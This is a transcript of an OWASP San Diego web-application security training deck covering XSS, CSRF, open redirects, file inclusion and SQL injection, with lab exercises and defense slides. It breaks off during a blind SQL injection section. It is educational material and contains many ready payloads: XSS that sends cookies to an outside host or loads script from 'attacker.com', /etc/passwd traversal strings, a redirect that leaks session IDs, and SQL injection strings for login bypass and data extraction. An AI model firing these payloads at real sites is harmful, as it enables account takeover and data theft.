OWASP San Diego Training Presentation
-
Upload
owaspsd -
Category
Technology
-
view
856 -
download
0
description
Transcript of OWASP San Diego Training Presentation
![Page 1: OWASP San Diego Training Presentation](https://reader035.fdocuments.in/reader035/viewer/2022081504/5552b01db4c905d9508b4e09/html5/thumbnails/1.jpg)
<script>alert(‘OWASP Training’);
</script>
![Page 2: OWASP San Diego Training Presentation](https://reader035.fdocuments.in/reader035/viewer/2022081504/5552b01db4c905d9508b4e09/html5/thumbnails/2.jpg)
Warning: This Presentation Is Intended For Educational Purposes Only
![Page 3: OWASP San Diego Training Presentation](https://reader035.fdocuments.in/reader035/viewer/2022081504/5552b01db4c905d9508b4e09/html5/thumbnails/3.jpg)
Setup Web Communication SQL Basics HTTP/HTTPS Overview Tools Other related technologies XSS CSRF URL Redirect Local File Inclusion (LFI) Remote File Inclusion (RFI) Direct Object Access SQL Injection Command Injection Javascript Server Side Injection
Topics
![Page 4: OWASP San Diego Training Presentation](https://reader035.fdocuments.in/reader035/viewer/2022081504/5552b01db4c905d9508b4e09/html5/thumbnails/4.jpg)
Kali Linux Firefox plugins
◦ Web Developer◦ User-Agent Switcher◦ Firebug◦ SOA Client
Setup Check
![Page 5: OWASP San Diego Training Presentation](https://reader035.fdocuments.in/reader035/viewer/2022081504/5552b01db4c905d9508b4e09/html5/thumbnails/5.jpg)
Setup https://172.17.0.42/dvwa/
Username: admin Password: *****
Exercise - DVWA Portal
![Page 6: OWASP San Diego Training Presentation](https://reader035.fdocuments.in/reader035/viewer/2022081504/5552b01db4c905d9508b4e09/html5/thumbnails/6.jpg)
Basic Web Communication
![Page 7: OWASP San Diego Training Presentation](https://reader035.fdocuments.in/reader035/viewer/2022081504/5552b01db4c905d9508b4e09/html5/thumbnails/7.jpg)
Client → Server
Client sends a request Server sends back a response E.g. Web Browser → Web Server (Port 80)
◦ Web Server → Postgres Database to fetch data⚫Returns data to Web Server to process and render to Web
Browser
Basic Web Communication
![Page 8: OWASP San Diego Training Presentation](https://reader035.fdocuments.in/reader035/viewer/2022081504/5552b01db4c905d9508b4e09/html5/thumbnails/8.jpg)
Web Request
Basic Web Communication
GET / HTTP/1.1Host: api.bonfire-project.eu:444Accept: */*Authorization: Basic XXXAccept-Encoding: gzip, deflate
![Page 9: OWASP San Diego Training Presentation](https://reader035.fdocuments.in/reader035/viewer/2022081504/5552b01db4c905d9508b4e09/html5/thumbnails/9.jpg)
Web Response
Basic Web Communication
HTTP/1.1 200 OK Vary: Authorization,Accept Transfer-Encoding: chunked Etag: "fa2ba873343ba638123b7671c8c09998" Content-Type: application/vnd.bonfire+xml; charset=utf-8 Date: Wed, 01 Jun 2011 14:59:30 GMT Server: thin 1.2.11 codename Bat-Shit Crazy Allow: GET,OPTIONS,HEAD Cache-Control: public,max-age=120 Connection: close
<?xml version="1.0" encoding="UTF-8"?> <root xmlns="http://api.bonfire-project.eu/doc/schemas/occi" href="/"> <version>0.8.9</version> <timestamp>1306940370</timestamp> <link rel="experiments" href="/experiments" type="application/vnd.bonfire+xml"/> <link rel="locations" href="/locations" type="application/vnd.bonfire+xml"/> <link rel="users" href="/users" type="application/vnd.bonfire+xml"/> </root>
![Page 10: OWASP San Diego Training Presentation](https://reader035.fdocuments.in/reader035/viewer/2022081504/5552b01db4c905d9508b4e09/html5/thumbnails/10.jpg)
Example using Burpsuite (Repeater)…
DEMO - Request/Response
![Page 11: OWASP San Diego Training Presentation](https://reader035.fdocuments.in/reader035/viewer/2022081504/5552b01db4c905d9508b4e09/html5/thumbnails/11.jpg)
GET POST HEAD TRACE PUT DELETE CONNECT OPTIONS
HTTP Methods
![Page 12: OWASP San Diego Training Presentation](https://reader035.fdocuments.in/reader035/viewer/2022081504/5552b01db4c905d9508b4e09/html5/thumbnails/12.jpg)
100 (Informational) 200 (Success) 300 (Redirect) 400 (Client Error) 500 (Server Error)
HTTP Response Codes
![Page 13: OWASP San Diego Training Presentation](https://reader035.fdocuments.in/reader035/viewer/2022081504/5552b01db4c905d9508b4e09/html5/thumbnails/13.jpg)
http://www.victim.com/page.aspx?parameter1=test¶meter2=test#location=3
HTTP URI/URL
![Page 14: OWASP San Diego Training Presentation](https://reader035.fdocuments.in/reader035/viewer/2022081504/5552b01db4c905d9508b4e09/html5/thumbnails/14.jpg)
Database communication
Web Server communicates to DB to fetch data
SQL or a SQL abstraction layer is used SQL = Structured Query Language
Basic Web Communication
![Page 15: OWASP San Diego Training Presentation](https://reader035.fdocuments.in/reader035/viewer/2022081504/5552b01db4c905d9508b4e09/html5/thumbnails/15.jpg)
Example Relational SQL DB
![Page 16: OWASP San Diego Training Presentation](https://reader035.fdocuments.in/reader035/viewer/2022081504/5552b01db4c905d9508b4e09/html5/thumbnails/16.jpg)
SELECT INSERT UPDATE DELETE
Types Of SQL Statements
![Page 17: OWASP San Diego Training Presentation](https://reader035.fdocuments.in/reader035/viewer/2022081504/5552b01db4c905d9508b4e09/html5/thumbnails/17.jpg)
SELECT column_name FROM table_name WHERE column_name=“value” ORDER BY column_name DESC
SELECT “random string” SELECT “random string” FROM DUAL
SeLeCt Price where ISBN_NO = ‘0201703092’;
SELECT Statement
![Page 18: OWASP San Diego Training Presentation](https://reader035.fdocuments.in/reader035/viewer/2022081504/5552b01db4c905d9508b4e09/html5/thumbnails/18.jpg)
Weak Passwords Open Directories Client Side Security Detailed Error Messages
Insecure Configuration
![Page 19: OWASP San Diego Training Presentation](https://reader035.fdocuments.in/reader035/viewer/2022081504/5552b01db4c905d9508b4e09/html5/thumbnails/19.jpg)
https://172.17.0.145/Web2/Client-Side Security - Exercise
https://172.17.0.145/CrackGomezsPassword/
Demo…
EXERCISE – Insecure config.
![Page 20: OWASP San Diego Training Presentation](https://reader035.fdocuments.in/reader035/viewer/2022081504/5552b01db4c905d9508b4e09/html5/thumbnails/20.jpg)
HTTPS Communication
![Page 21: OWASP San Diego Training Presentation](https://reader035.fdocuments.in/reader035/viewer/2022081504/5552b01db4c905d9508b4e09/html5/thumbnails/21.jpg)
SSL/TLS Versions: SSLv2, SSLv3, TLS1.0, TLS1.1, TLS1.2
Key Exchange Mechanisms: RSA, DH, DHE/EDH, ECDHE, …
Authentication Mechanisms: RSA, … Encryption Algorithms: RC4, DES, AES, IDEA,
SEED, … Encryption Modes: CBC, ECB, GSM, Counter,
…
HTTPS Overview
![Page 22: OWASP San Diego Training Presentation](https://reader035.fdocuments.in/reader035/viewer/2022081504/5552b01db4c905d9508b4e09/html5/thumbnails/22.jpg)
HTTPS = HTTP over TLSv1.0, TLSv1.2 or SSLv3 * are optional
CLIENT SERVERClientHello -----> [ServerHello Certificate * <----- ServerKeyExchange * CertificateRequest *]Certificate *ClientKeyExchange -----> CertificateVerify *
<----- FinishedApplication Data <-----> Application Data
HTTPS Overview
![Page 23: OWASP San Diego Training Presentation](https://reader035.fdocuments.in/reader035/viewer/2022081504/5552b01db4c905d9508b4e09/html5/thumbnails/23.jpg)
HTTPS Overview
![Page 24: OWASP San Diego Training Presentation](https://reader035.fdocuments.in/reader035/viewer/2022081504/5552b01db4c905d9508b4e09/html5/thumbnails/24.jpg)
HTTPS Overview
![Page 25: OWASP San Diego Training Presentation](https://reader035.fdocuments.in/reader035/viewer/2022081504/5552b01db4c905d9508b4e09/html5/thumbnails/25.jpg)
Burpsuite
![Page 26: OWASP San Diego Training Presentation](https://reader035.fdocuments.in/reader035/viewer/2022081504/5552b01db4c905d9508b4e09/html5/thumbnails/26.jpg)
Demo/Exercise
Burpsuite
![Page 27: OWASP San Diego Training Presentation](https://reader035.fdocuments.in/reader035/viewer/2022081504/5552b01db4c905d9508b4e09/html5/thumbnails/27.jpg)
Web Developer Toolbar
![Page 28: OWASP San Diego Training Presentation](https://reader035.fdocuments.in/reader035/viewer/2022081504/5552b01db4c905d9508b4e09/html5/thumbnails/28.jpg)
Firebug
![Page 29: OWASP San Diego Training Presentation](https://reader035.fdocuments.in/reader035/viewer/2022081504/5552b01db4c905d9508b4e09/html5/thumbnails/29.jpg)
IE Developer Toolbar (F12)
![Page 30: OWASP San Diego Training Presentation](https://reader035.fdocuments.in/reader035/viewer/2022081504/5552b01db4c905d9508b4e09/html5/thumbnails/30.jpg)
User Agent Switcher
![Page 31: OWASP San Diego Training Presentation](https://reader035.fdocuments.in/reader035/viewer/2022081504/5552b01db4c905d9508b4e09/html5/thumbnails/31.jpg)
Download user agent xml list◦ http://techpatterns.com/forums/about304.html
User Agent Switcher
![Page 32: OWASP San Diego Training Presentation](https://reader035.fdocuments.in/reader035/viewer/2022081504/5552b01db4c905d9508b4e09/html5/thumbnails/32.jpg)
SOA Client
![Page 33: OWASP San Diego Training Presentation](https://reader035.fdocuments.in/reader035/viewer/2022081504/5552b01db4c905d9508b4e09/html5/thumbnails/33.jpg)
XML HTTP Request (XHR)◦ XML HTTP header
Javascript Serialized Object Notation (JSON)◦ Way of representing data◦ { “Firstname”: “Jake”, “lastname”: “Jones” }
SOAP◦ Look for asmx files or asmx?WSDL◦ Could be server to server or client to server
REST◦ Parameters specified in url◦ If you don’t have documentation you can try and
guess the REST parameters
Other HTTP Related Technologies
![Page 34: OWASP San Diego Training Presentation](https://reader035.fdocuments.in/reader035/viewer/2022081504/5552b01db4c905d9508b4e09/html5/thumbnails/34.jpg)
Reflected XSS Stored XSS Dom Based XSS
Cross-Site Scripting (XSS)
![Page 35: OWASP San Diego Training Presentation](https://reader035.fdocuments.in/reader035/viewer/2022081504/5552b01db4c905d9508b4e09/html5/thumbnails/35.jpg)
http://192.168.1.124/WackoPicko/pictures/search.php?query=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&x=0&y=0
Reflected XSS can be in POST
Reflected XSS
![Page 36: OWASP San Diego Training Presentation](https://reader035.fdocuments.in/reader035/viewer/2022081504/5552b01db4c905d9508b4e09/html5/thumbnails/36.jpg)
Can be in user agent Could be in cookie Use to be able to control a lot of HTTP
headers in flash
Reflected XSS
![Page 37: OWASP San Diego Training Presentation](https://reader035.fdocuments.in/reader035/viewer/2022081504/5552b01db4c905d9508b4e09/html5/thumbnails/37.jpg)
Html and or Javascript is stored on the server and can be later accessed by a user
Stored XSS
![Page 38: OWASP San Diego Training Presentation](https://reader035.fdocuments.in/reader035/viewer/2022081504/5552b01db4c905d9508b4e09/html5/thumbnails/38.jpg)
User input is gathered by javascript and reflected back to the page
Try exploits with IE (or safari mobile…)
Dom Based XSS
![Page 39: OWASP San Diego Training Presentation](https://reader035.fdocuments.in/reader035/viewer/2022081504/5552b01db4c905d9508b4e09/html5/thumbnails/39.jpg)
Put canary value in http://victim.com/id=yoyoyo Use web developer toolbar to view
generated source Check to see where the canary is in the
source Check to see if html encoding is being used
or what characters are available◦ http://victim.com/id=yoyoyo<
Sploit if possible
Finding XSS
![Page 40: OWASP San Diego Training Presentation](https://reader035.fdocuments.in/reader035/viewer/2022081504/5552b01db4c905d9508b4e09/html5/thumbnails/40.jpg)
<script>var+i=new+Image;+i.src="http://192.168.1.120"%2bdocument.cookie;</script>
<SCRIPT SRC=HTTP://ATTACKER.COM/AAA.JS></SCRIPT>
Exploiting XSS Vulns
![Page 41: OWASP San Diego Training Presentation](https://reader035.fdocuments.in/reader035/viewer/2022081504/5552b01db4c905d9508b4e09/html5/thumbnails/41.jpg)
Host XSS javascript files or resources on Apache Server
Or start python server◦ python –m SimpleHTTPServer
SimpleHTTPServer can be easily wrapped using ssl library in python
Exploiting XSS Vulns
![Page 42: OWASP San Diego Training Presentation](https://reader035.fdocuments.in/reader035/viewer/2022081504/5552b01db4c905d9508b4e09/html5/thumbnails/42.jpg)
Browser Exploitation Framework (BeEF)
Exploiting XSS Vulns
![Page 43: OWASP San Diego Training Presentation](https://reader035.fdocuments.in/reader035/viewer/2022081504/5552b01db4c905d9508b4e09/html5/thumbnails/43.jpg)
HTMLEncode All Output Be Careful where user output is placed in
HTML◦ <html>HTML encoding won’t save you
here<script src=http://[user_controled_input]></script></html>
Do NOT write user input into javascript section of page
XSS Defense
![Page 44: OWASP San Diego Training Presentation](https://reader035.fdocuments.in/reader035/viewer/2022081504/5552b01db4c905d9508b4e09/html5/thumbnails/44.jpg)
https://172.17.0.42/dvwa/ XSS Reflect exercise
EXERCISE - XSS
![Page 45: OWASP San Diego Training Presentation](https://reader035.fdocuments.in/reader035/viewer/2022081504/5552b01db4c905d9508b4e09/html5/thumbnails/45.jpg)
Request on behalf of attacker https://victim.com/change_password.asp?
username=admin&password=mypassword123
If tokens are not random they can be guessed or bruteforced
CSRF can be in GET or POST
Cross Site Request Forgery (CSRF)
![Page 46: OWASP San Diego Training Presentation](https://reader035.fdocuments.in/reader035/viewer/2022081504/5552b01db4c905d9508b4e09/html5/thumbnails/46.jpg)
CSRF Tokens◦ Generate random tokens◦ Make sure you check your tokens ☺
CSRF Defense
![Page 47: OWASP San Diego Training Presentation](https://reader035.fdocuments.in/reader035/viewer/2022081504/5552b01db4c905d9508b4e09/html5/thumbnails/47.jpg)
https://victim.com/login.asp?landing_page=/user.asp
https://victim.com/login.asp?landing_page=http://www.google.com
URL Redirect
![Page 48: OWASP San Diego Training Presentation](https://reader035.fdocuments.in/reader035/viewer/2022081504/5552b01db4c905d9508b4e09/html5/thumbnails/48.jpg)
If you can’t use http try https If you can’t use http or https try //google.com
URL Redirect
![Page 49: OWASP San Diego Training Presentation](https://reader035.fdocuments.in/reader035/viewer/2022081504/5552b01db4c905d9508b4e09/html5/thumbnails/49.jpg)
Redirecting to other pages within the site can still be considered a vulnerability
For example, when combining the attack with other attacks like XSS, CSRF, out of band SQL injection, or command injection
https://victim.com/login.aspx?page=user.aspx?param=<script>alert(1)</script>
URL Redirect
![Page 50: OWASP San Diego Training Presentation](https://reader035.fdocuments.in/reader035/viewer/2022081504/5552b01db4c905d9508b4e09/html5/thumbnails/50.jpg)
URL Redirect can be used to steal session information in the URL by analyzing the refer header
https://victim.com/login?page=http://attacker.com
https://victim.com/login?page=http://attacker.com&jsessionId=AB21CF40A3BD698
URL Redirect
![Page 51: OWASP San Diego Training Presentation](https://reader035.fdocuments.in/reader035/viewer/2022081504/5552b01db4c905d9508b4e09/html5/thumbnails/51.jpg)
Store location of redirect(s) on the server Create whitelist of possible URLs to redirect
to
URL Redirect
![Page 52: OWASP San Diego Training Presentation](https://reader035.fdocuments.in/reader035/viewer/2022081504/5552b01db4c905d9508b4e09/html5/thumbnails/52.jpg)
PHP functions ◦ include()◦ include_once()◦ require()◦ require_once()◦ fopen()
Local File Inclusion
![Page 53: OWASP San Diego Training Presentation](https://reader035.fdocuments.in/reader035/viewer/2022081504/5552b01db4c905d9508b4e09/html5/thumbnails/53.jpg)
../../../../../../../../../../../etc/passwd ..\..\..\..\..\..\..\..\..\..\..\..\windows\win.ini ..\..\..\..\..\..\..\..\boot.ini
.././.././.././.././.././../etc/passwd %2e%2e%2f%2e%2e%2f%2e%2e%2f%2e
%2e%2fetc%2fpasswd
Local File Inclusion
![Page 54: OWASP San Diego Training Presentation](https://reader035.fdocuments.in/reader035/viewer/2022081504/5552b01db4c905d9508b4e09/html5/thumbnails/54.jpg)
Typically Java and .NET LFI vulns will not allow access outside of web root folder
Instead of trying ../../../../../../../../../../../etc/passwd first try ../index.jsp or ../../scripta.js
Local File Inclusion
![Page 55: OWASP San Diego Training Presentation](https://reader035.fdocuments.in/reader035/viewer/2022081504/5552b01db4c905d9508b4e09/html5/thumbnails/55.jpg)
Harden php.ini file and other configuration files
Make sure web directories are not writable Don’t trust user input for file operations
LFI Defense
![Page 56: OWASP San Diego Training Presentation](https://reader035.fdocuments.in/reader035/viewer/2022081504/5552b01db4c905d9508b4e09/html5/thumbnails/56.jpg)
https://172.17.0.42/dvwa/ File Inclusion exercise
EXERCISE - LFI
![Page 57: OWASP San Diego Training Presentation](https://reader035.fdocuments.in/reader035/viewer/2022081504/5552b01db4c905d9508b4e09/html5/thumbnails/57.jpg)
Whether to allow the treatment of URLs (like http:// or ftp://) as files.http://victim.com/allow-url-fopenallow_url_fopen = On
Whether to allow include/require to open URLs (like http:// or ftp://) as files.http://victim.com/allow-url-includeallow_url_include = On
Remote File Inclusion
![Page 58: OWASP San Diego Training Presentation](https://reader035.fdocuments.in/reader035/viewer/2022081504/5552b01db4c905d9508b4e09/html5/thumbnails/58.jpg)
Go straight to file Directory listing helps a lot Can use burp intruder Check robots.txt Dirbuster Burp engagement
Direct Object Access
![Page 59: OWASP San Diego Training Presentation](https://reader035.fdocuments.in/reader035/viewer/2022081504/5552b01db4c905d9508b4e09/html5/thumbnails/59.jpg)
SQL is standard query language implemented by several organizations
MySQL MSSQL Oracle Postgres DB2
SQL Injection
![Page 60: OWASP San Diego Training Presentation](https://reader035.fdocuments.in/reader035/viewer/2022081504/5552b01db4c905d9508b4e09/html5/thumbnails/60.jpg)
Error Union Blind Bypass (eg. Authentication Bypass)
Types Of SQL Injection
![Page 61: OWASP San Diego Training Presentation](https://reader035.fdocuments.in/reader035/viewer/2022081504/5552b01db4c905d9508b4e09/html5/thumbnails/61.jpg)
' " ') ))))))))) ; \' \" -- ' or 1=1 -- ' and 1=2 -- %27 %2527 %22 # /**/ ' waitfor delay '0:0:20'-- '+waitfor+delay+'0:0:20'+-- ' (select sleep(20)) – - ‘ (select pg_sleep(20))-- '/**/(select/**/sleep(20))/**/--%20 or 1=(select benchmark(1000000,MD5(‘A’)))--
convert(varchar,0x7b5d) chr(0xbf).chr(0x27)
Triggering SQL Injection
![Page 62: OWASP San Diego Training Presentation](https://reader035.fdocuments.in/reader035/viewer/2022081504/5552b01db4c905d9508b4e09/html5/thumbnails/62.jpg)
Places to try when trying to trigger a SQL injection:◦ GET parameters◦ POST parameters◦ HEAD parameters (Blind injection only)◦ Cookie◦ Refer header◦ Agent ID◦ SOAP parameters◦ JSON parameters
Try using Burp to defeat client side (javascript) SQL injection protections
Triggering SQL Injection
![Page 63: OWASP San Diego Training Presentation](https://reader035.fdocuments.in/reader035/viewer/2022081504/5552b01db4c905d9508b4e09/html5/thumbnails/63.jpg)
admin‘ or 1=1 –- admin‘ or ‘1’=‘1 admin‘/**/or/**/2/**/LiKe/**/2--/**/
SELECT username, password from users WHERE username = ‘admin’ and password = ‘admin’;
SELECT username, password from usersWHERE username = ‘admin‘ or 1=1 –- ’ and password = ‘admin’
SQL Injection Authentication Bypass
![Page 64: OWASP San Diego Training Presentation](https://reader035.fdocuments.in/reader035/viewer/2022081504/5552b01db4c905d9508b4e09/html5/thumbnails/64.jpg)
https://172.17.0.42/owaspbricks/login-1/ exercise
EXERCISE – SQL Injection Auth. Bypass
![Page 65: OWASP San Diego Training Presentation](https://reader035.fdocuments.in/reader035/viewer/2022081504/5552b01db4c905d9508b4e09/html5/thumbnails/65.jpg)
https://172.17.0.42/owaspbricks/login-2/ exercise
EXERCISE – SQL Injection Auth. Bypass
![Page 66: OWASP San Diego Training Presentation](https://reader035.fdocuments.in/reader035/viewer/2022081504/5552b01db4c905d9508b4e09/html5/thumbnails/66.jpg)
https://172.17.0.145/Web1/ exercise
EXERCISE – SQL Injection Auth. Bypass
![Page 67: OWASP San Diego Training Presentation](https://reader035.fdocuments.in/reader035/viewer/2022081504/5552b01db4c905d9508b4e09/html5/thumbnails/67.jpg)
Errors must be turned on in configuration of database or exceptions in code are not handled properly and are printed back to the user
Goal is to make database throw an error message and print back the error message with valuable data in it
ERROR Based SQL Injection
![Page 68: OWASP San Diego Training Presentation](https://reader035.fdocuments.in/reader035/viewer/2022081504/5552b01db4c905d9508b4e09/html5/thumbnails/68.jpg)
http://victim.com/showmovies.aspx?name=rad' and 1=0/@@version --
Server Error in '/' Application.Syntax error converting the nvarchar value 'Microsoft SQL Server 2000 – 8.00.760 (Intel X86) Dec 17 2002 14:22:05 Copyright © 1988-2003 Microsoft Corporation Enterprise Edition on Windows NT 5.2 (Build 3790: )' to a column of datatype int.Description: An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code.
ERROR Based SQL Injection
![Page 69: OWASP San Diego Training Presentation](https://reader035.fdocuments.in/reader035/viewer/2022081504/5552b01db4c905d9508b4e09/html5/thumbnails/69.jpg)
(MSSQL) Get column name http://victim.com/showmovies.aspx?name=rad' having '1'='1WEBUSERS.UserID
Get next column namehttp://victim.com/showmovies.aspx?name=rad' group by UserID having '1'='1WEBUSERS.Username
ERROR Based SQL Injection
![Page 70: OWASP San Diego Training Presentation](https://reader035.fdocuments.in/reader035/viewer/2022081504/5552b01db4c905d9508b4e09/html5/thumbnails/70.jpg)
Error Based SQLi MySQL
http://victim.com/showmovies.php?name=rad' and ExtractValue(1,CONCAT(0x5c, (SELECT @@version))) --%20
‘ XPATH syntax error: ‘\5.1.41-3ubuntu12.6-log’
ERROR Based SQL Injection
![Page 71: OWASP San Diego Training Presentation](https://reader035.fdocuments.in/reader035/viewer/2022081504/5552b01db4c905d9508b4e09/html5/thumbnails/71.jpg)
For Oracle Error Based SQL Injection use utl_inaddr.get_host_name() function
http://victim.com/showmovies.jsp?name=rad' and (utl_inaddr.get_host_name((select+sys.database_name+from+dual)))=1 --
ORA-29257: host MOVIE_DATABASE unknownORA-06512: at 'SYS.UTL_INADDR' line 4ORA-06512: at 'SYS.UTL_INADDR' line 35ORA-06512: at line 1
ERROR Based SQL Injection
![Page 72: OWASP San Diego Training Presentation](https://reader035.fdocuments.in/reader035/viewer/2022081504/5552b01db4c905d9508b4e09/html5/thumbnails/72.jpg)
Sometimes the utl_inaddr.get_host_name() function can produce the following error:◦ ORA-24247: network access denied by
access control list (ACL)
The following technique will work regardless of network restrictions/permissions
(select%201%20from%20dual%20where%201=1%20and%201=length(extractvalue(xmltype('<x/>'),'/$'||(select%20user%20from%20dual))))
ERROR Based SQL Injection
![Page 73: OWASP San Diego Training Presentation](https://reader035.fdocuments.in/reader035/viewer/2022081504/5552b01db4c905d9508b4e09/html5/thumbnails/73.jpg)
Postgres
http://victim.com/showmovies.do?name=rad' and 1=cast(version() as int)--
ERROR: invalid input syntax for integer “PostgreSQL 8.3.7 on i686-pc-linux-gnu, compiled by GCC gcc (GCC) 4.1.2 20071124 (Red Hat 4.1.2-42)”
ERROR Based SQL Injection
![Page 74: OWASP San Diego Training Presentation](https://reader035.fdocuments.in/reader035/viewer/2022081504/5552b01db4c905d9508b4e09/html5/thumbnails/74.jpg)
https://172.17.0.42/dvwa/ → SQL Injection
Demo/Exercise – Errorbased SQL Injection
![Page 75: OWASP San Diego Training Presentation](https://reader035.fdocuments.in/reader035/viewer/2022081504/5552b01db4c905d9508b4e09/html5/thumbnails/75.jpg)
Find columns◦ ‘ order by 2 --
Find columns that return data◦ ‘ union select 1,2 --
Extract data using column ◦ ‘ union select 1,@@version --
Union Based SQL Injection
![Page 76: OWASP San Diego Training Presentation](https://reader035.fdocuments.in/reader035/viewer/2022081504/5552b01db4c905d9508b4e09/html5/thumbnails/76.jpg)
https://172.17.0.42/dwa/ → SQL Injection
Demo/Exercise – Unionbased SQL Injection
![Page 77: OWASP San Diego Training Presentation](https://reader035.fdocuments.in/reader035/viewer/2022081504/5552b01db4c905d9508b4e09/html5/thumbnails/77.jpg)
When entering a sqli trigger you get a generic error or redirect (HTTP 200, 302, 500)
To confirm the sql injection try using a time based delay◦ waitfor delay '0:0:20' -- (MS SQL) ◦ benchmark(100000000, rand()),1) -- (MySQL)◦ select sleep(20) -- (MySQL (version 5.0.12 and later))◦ pg_sleep(20) -- (Postgres)◦ 'a'||Utl_Http.request('http://madeupserver.com') --
(Oracle) ◦ dbms_lock.sleep(20) -- (Oracle (Only DBA, requires
plsql injection and doesn’t work in where clause))
Blind SQL Injection
![Page 78: OWASP San Diego Training Presentation](https://reader035.fdocuments.in/reader035/viewer/2022081504/5552b01db4c905d9508b4e09/html5/thumbnails/78.jpg)
Examples of confirming SQL Injectionhttp://victim.com/showmovies.aspx?name=rad' waitfor delay '0:0:20' --http://victim.com/showmovies.php?name=rad' or 1= (select sleep(20)) --%20http://victim.com/showmovies.do?name=rad' pg_sleep(20) --http://victim.com/showmovies.jsp?name=rad' 'a'||Utl_Http.request('http://madeupserver.com') --
Blind SQL Injection
![Page 79: OWASP San Diego Training Presentation](https://reader035.fdocuments.in/reader035/viewer/2022081504/5552b01db4c905d9508b4e09/html5/thumbnails/79.jpg)
Other methods for confirming Blind SQL Injection Try using addition or subtraction
◦ http://victim.com/showmovies.aspx?id=2◦ http://victim.com/showmovies.aspx?id=3-1◦ http://victim.com/showmovies.aspx?id=1%2b1
Try using a comment◦ http://victim.com/showmovies.aspx?name=rad' --◦ http://victim.com/showmovies.aspx?id=1 /**/
Try a percent sign or a statement that evaluates to true and/or false◦ http://victim.com/showmovies.aspx?name=%◦ http://victim.com/showmovies.aspx?name=rad' or 1=1 --◦ http://victim.com/showmovies.aspx?name=rad' and 1=2 --
Try string concatenation◦ (MSSQL) http://victim.com/showmovies.aspx?name=ra'%2b‘d◦ (Oracle) http://victim.com/showmovies.jsp?name=ra'||'d◦ (MySQL) http://victim.com/showmovies.php?name=ra' 'd
Blind SQL Injection
![Page 80: OWASP San Diego Training Presentation](https://reader035.fdocuments.in/reader035/viewer/2022081504/5552b01db4c905d9508b4e09/html5/thumbnails/80.jpg)
Extracting Data (TRUE or FALSE)http://victim.com/showmovies.aspx?name=rad' ;if is_srvrolemember('sysadmin')=1 waitfor delay '0:0:20'--
http://victim.com/showmovies.aspx?name=rad';if @@version like '%252005%25' waitfor delay '0:0:20' --
Blind SQL Injection
![Page 81: OWASP San Diego Training Presentation](https://reader035.fdocuments.in/reader035/viewer/2022081504/5552b01db4c905d9508b4e09/html5/thumbnails/81.jpg)
LIKE techniquehttp://victim.com/search.aspx?id=1';if SYSTEM_USER like '%25a%25' waitfor delay '0:0:12'--(TRUE) (contains 'a')
http://victim.com/search.aspx?id=1';if SYSTEM_USER like '%25e%25' waitfor delay '0:0:12'--(TRUE) (contains 'e')
http://victim.com/search.aspx?id=1';if SYSTEM_USER like '%25o%25' waitfor delay '0:0:12'--(TRUE) (contains 'o')
http://victim.com/search.aspx?id=1';if SYSTEM_USER like '%25p%25' waitfor delay '0:0:12'--(TRUE) (contains 'p')
Blind SQL Injection
![Page 82: OWASP San Diego Training Presentation](https://reader035.fdocuments.in/reader035/viewer/2022081504/5552b01db4c905d9508b4e09/html5/thumbnails/82.jpg)
LIKE technique Continued
http://victim.com/search.aspx?id=1';if SYSTEM_USER like '%25r%25' waitfor delay '0:0:12'--(TRUE) (contains 'r')
http://victim.com/search.aspx?id=1';if SYSTEM_USER like '%25s%25' waitfor delay '0:0:12'--(TRUE) (contains 's')
http://victim.com/search.aspx?id=1';if SYSTEM_USER like '%25u%25' waitfor delay '0:0:12'--(TRUE) ( contains 'u' )
http://victim.com/search.aspx?id=1';if SYSTEM_USER like '%25w%25' waitfor delay '0:0:12'--(TRUE) ( contains 'w' )
http://victim.com/search.aspx?id=1';if SYSTEM_USER like '%25_%25' waitfor delay '0:0:12'--(TRUE) ( contains '_' )
(aeoprsuw_)
Blind SQL Injection
![Page 83: OWASP San Diego Training Presentation](https://reader035.fdocuments.in/reader035/viewer/2022081504/5552b01db4c905d9508b4e09/html5/thumbnails/83.jpg)
LIKE Technique Continuedhttp://victim.com/search.aspx?id=1';if SYSTEM_USER like 'o%25' waitfor delay '0:0:12'--(TRUE) ( starts with 'o')
http://victim.com/search.aspx?id=1';if SYSTEM_USER like 'ow%25' waitfor delay '0:0:12'--(TRUE) ( starts with 'ow')
http://victim.com/search.aspx?id=1';if SYSTEM_USER like 'owa%25' waitfor delay '0:0:12'--(TRUE) ( starts with 'owa')
http://victim.com/search.aspx?id=1';if SYSTEM_USER like 'owas%25 waitfor delay '0:0:12'--(TRUE) ( starts with 'owasp')
Blind SQL Injection
![Page 84: OWASP San Diego Training Presentation](https://reader035.fdocuments.in/reader035/viewer/2022081504/5552b01db4c905d9508b4e09/html5/thumbnails/84.jpg)
LIKE Technique Continued
http://victim.com/search.aspx?id=1';if SYSTEM_USER like 'owasp%25' waitfor delay '0:0:12'--(TRUE) ( starts with 'owasp')
http://victim.com/search.aspx?id=1';if SYSTEM_USER like 'owasp_%25' waitfor delay '0:0:12'--(TRUE) (starts with 'owasp_')
http://victim.com/search.aspx?id=1';if SYSTEM_USER like 'owasp_u%25' waitfor delay '0:0:12'--(TRUE) (user is 'owasp_u')
http://victim.com/search.aspx?id=1';if SYSTEM_USER like 'owasp_us%25' waitfor delay '0:0:12'--(TRUE) (user is 'owasp_us')
http://victim.com/search.aspx?id=1';if SYSTEM_USER like 'owasp_use%25' waitfor delay '0:0:12'--(TRUE) (user is 'owasp_use')
http://victim.com/search.aspx?id=1';if SYSTEM_USER like 'owasp_user' waitfor delay '0:0:12'--(TRUE) (user is 'owasp_user')
Blind SQL Injection
![Page 85: OWASP San Diego Training Presentation](https://reader035.fdocuments.in/reader035/viewer/2022081504/5552b01db4c905d9508b4e09/html5/thumbnails/85.jpg)
Binary Search Techniquehttp://victim.com/search.aspx?id=1';if ASCII(SUBSTRING(SYSTEM_USER,1,1)) <127 waitfor delay'0:0:20'--TRUE
http://victim.com/search.aspx?id=1';if ASCII(SUBSTRING(SYSTEM_USER,1,1)) <63 waitfor delay'0:0:20'--FALSE
http://victim.com/search.aspx?id=1';if ASCII(SUBSTRING(SYSTEM_USER,1,1)) <95 waitfor delay'0:0:20'--FALSE
http://victim.com/search.aspx?id=1';if ASCII(SUBSTRING(SYSTEM_USER,1,1)) <110 waitfor delay'0:0:20'--FALSE
Blind SQL Injection
![Page 86: OWASP San Diego Training Presentation](https://reader035.fdocuments.in/reader035/viewer/2022081504/5552b01db4c905d9508b4e09/html5/thumbnails/86.jpg)
Binary Search Technique Continued
